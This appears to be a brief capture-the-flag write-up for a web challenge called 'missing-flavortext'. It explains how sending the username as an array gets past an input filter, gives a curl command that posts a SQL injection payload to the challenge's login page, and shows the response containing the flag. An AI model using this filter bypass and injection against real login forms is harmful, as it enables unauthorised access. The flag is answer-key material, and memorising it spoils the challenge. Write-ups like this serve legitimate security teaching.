Tags: web
Rating: 1.0
Because server set `app.use(bodyParser.urlencoded({ extended: true }));` so we can bypass filter with post an array to the server
```
$ curl -X POST -d "username[]=nhienit' or 1=1/*&password=213" "https://missing-flavortext.dicec.tf/login"
<html>
<head>
<link rel="stylesheet" href="/styles.css">
</head>
<body>
<div>
Looks like there was no flavortext here either :(
Here's your flag?
dice{sq1i_d03sn7_3v3n_3x1s7_4nym0r3}